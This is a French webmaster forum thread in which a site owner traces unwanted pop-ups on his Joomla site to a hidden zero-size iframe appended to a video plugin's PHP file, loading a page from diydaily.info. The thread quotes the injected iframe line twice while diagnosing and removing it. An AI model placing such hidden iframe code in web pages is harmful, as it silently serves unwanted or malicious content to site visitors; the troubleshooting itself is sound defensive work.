Serveur Hacké ?

thecashcow

WRInaute discret
Bonjour tout le monde,

Je vous écrit aujourd'hui car j'ai besoin d'avoir des avis extérieur sur ce qu'il m'arrive depuis une semaine déjà. (J'ai cherché avant de poster)

Sur mon site (buzzmoica.Fr), des pop-ups s'ouvrent à tout va sur n'importe quelle de mes pages alors que bien sûr, je n'ai jamais installé de script pour de telles pubs.

La monétisation du site est uniquement avec Adsense qui vous le savez, n'autorise pas ces publicités intempestives.

Le site est hébergé sur un dédié OVH. Je leur ai écrit et j'attends toujours leur réponse.

Les pubs sont apparemment générées par une plateforme qui s'appelle Blue Advetiser.

Est ce que cela dit quelque chose à quelqu'un ? Avez vous déjà eu ce genre de problème ?

Merci d'avance pour vos réponses ! :lol:
 

nickargall

WRInaute accro
(hs) oui on peut le faire, mais c'est pas tres clean(/hs)

En ce qui concerne les popup : ca peut etre un bout de javascript que tu as inséré sur ton site (un truc de compteur gratuit, un script d'annuaire ..) qui génère ces affichages ? Mais j'ai pas vu grand chose dans ton code (survolé rapidement) qui puisse générer ça (a part ptet un script javascript "ltassrv" mais placé en commentaires html, donc ..
 

thecashcow

WRInaute discret
oui

Merci pour les réponses :)

J'ai pensé à ça au début, un bout de script perdu, mais rien. Et en plus, ya pas vraiment de raison qu'il y en ai.
Concernant les widgets qui pourraient contenir une pub, pareil, rien à signaler, je n'en ai pas installé.

C'est quand même incroyable dene pas savoir d'où ca vient non ? :) :) :)

Je me demande si OVH n'est pas derrière tout ca.

Pourquoi je pense ça ? Parce que les popups ont commencé à apparaitre le 14 Aout, le jour où il y a eu un problème sur le serveur et qu'une équipe est intervenue sur le serveur. ils ont tout géré tout seul en 24 heures. J'étais en vacances, je ne me suis apperçu de rien. j'ai juste découvert les emails de maintenance...

De plus, ayant installé un disque USB supplémentaire sur le seveur il y a 2 mois, ce même problème était survenu. Il a disparu après que j'ai formaté le lecteur usb et fait son installation.

Ca me parrait logique pour considérer qu'il y a quelque chose avec ovh. Mais je ne comprends pas pourquoi ni comment !
(J'attends toujours la réponse de leur hotline)

:?
 

Bool

WRInaute passionné
Oh c'est clair que c'est vachement intéressant de la part d'OVH d'aller installer des popups sur les sites de certains clients dédiés...

Tu as un Joomla, et les failles de sécurité y sont fréquentes. Je chercherais d'abord de ce coté à ta place.
 

thecashcow

WRInaute discret
Oui tu as raison, ca parrait absurde.
Je vais continuer sur la sécu alors...
Au hasard, Y aurait il un site qui puisse scanner en live et détecter les failles ?
Merci ! :) :)
 

guicara

WRInaute passionné
Moi je vois ça au chargement de ton index :

adpx4.gif


Voulu ?
 

vaxrei

Nouveau WRInaute
regarde de ce coté :

Code:
<iframe frameborder="0"height="0"width="0"
src="http://www.diydaily.info/player/player.php"></iframe>
 

thecashcow

WRInaute discret
re

Re Bonjour,

Alors, grâce à vos réponses, je pense être sur la piste.
Comme vous l'avez noté, le site est développé sous Joomla.

Je pense pour l'instant que c'est le module lié au composant Mosets Tree qui a été infiltré.
Sur la page d'accueil, le module se nomme : "Vos Buzz à la Une" et il y a un module similaire dans la section news : "Vos Buzz au hasard"
Ce Script (Iframe) n'est présent que lorsque le module est présent.
Mais je ne suis pas sûr parce que le système de popups ne se déclenche pas toujours, cad que je peux actualiser la page sur laquelle la pub apparaissait sans pour autant qu'elle ne ressorte une deuxième fois...

Ca avance :)
 

vaxrei

Nouveau WRInaute
Tu peux aussi faire une recherche dans un moteur :
-https://www.google.fr/search?q=%22diydaily%2einfo%2fplayer%2fplayer

apparement cela vient du module "Extreme Video Plugin"
 

thecashcow

WRInaute discret
Merci à tous !

Excellent ! Le problème est résolu !

C'était donc bien un mambot de Joomla, en l'occurence "XtremVideoPlayPack" qui permet de lire les vidéos de Youtube, Daily...Etc dansles articles.

A la fin du fichier XtremVideoPlayPack.php il y a avait le fameux script :

<iframe frameborder="0"height="0"width="0"
src="http://www.diydaily.info/player/player.php"></iframe>

Je l'ai supprimée et bingo !

Il semble que le créateur de ce mambot envoie fréquemment son script dans le php du plugin. Il y a un post à ce sujet en anglais ici : -http://forum.joomla.org/viewtopic.php?f=432&t=304197&p=1340536

Merci beaucoup à vous tous (toutes?) de m'avoir aidé pour ce problème qui pourrissait la vie de mes internautes !

Au plaisir :) :) :) :) :)
 

Discussions similaires

Haut